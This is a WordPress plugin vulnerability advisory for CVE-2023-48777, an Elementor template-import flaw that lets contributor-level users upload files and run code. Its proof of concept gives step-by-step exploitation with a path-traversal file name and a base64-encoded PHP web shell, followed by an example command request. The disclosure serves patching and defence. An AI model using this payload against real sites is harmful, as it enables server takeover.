Elementor < 3.18.2 – Contributor+ Arbitrary File Upload to RCE via Template Import | CVE 2023-48777 | Plugin Vulnerabilities

Description

The plugin is vulnerable to Remote Code Execution via file upload via the template import functionality, allowing authenticated attackers, with contributor-level access and above, to upload files and execute code on the server.

Proof of Concept

1. Edit a post in Elementor.
2. Import a template (folder icon on an Elementor block).
3. Pick any JSON file, and intercept the AJAX request.
4. Replace the file name with "/../../../../shell.php"
5. Replace the base64 contents (fileData) with "PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4="
6. Visit /wp-content/shell.php?cmd=id to see the RCE.

Affects Plugins

Fixed in 3.18.2

References

CVE

URL

https://www.wordfence.com/threat-intel/vulnerabilities/id/5b6d0a38-ac28-41c9-9da1-b30b3657b463

Classification

Type

RCE

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Hong Quan

Verified

Yes

WPVDB ID

a6b3b14c-f06b-4506-9b88-854f155ebca9

Timeline

Publicly Published

2023-12-06 (about 2 years ago)

Added

2023-12-08 (about 2 years ago)

Last Updated

2023-12-12 (about 2 years ago)

Other

Published

Title

Published

2020-03-31

Title

LifterLMS < 3.37.15 - Arbitrary File Writing

Published

2025-01-29

Title

Contact Form & SMTP Plugin for WordPress by PirateForms < 2.6.1 - Unauthenticated Arbitrary Shortcode Execution

Published

2020-01-21

Title

AccessAlly < 3.3.2 - Unauthenticated Arbitrary PHP Code Execution

Published

2014-09-16

Title

WordPress 3.9 & 3.9.1 Unlikely Code Execution

Published

2025-09-05

Title

Rehub < 19.9.8 - Unauthenticated Arbitrary Shortcode Execution via re_filterpost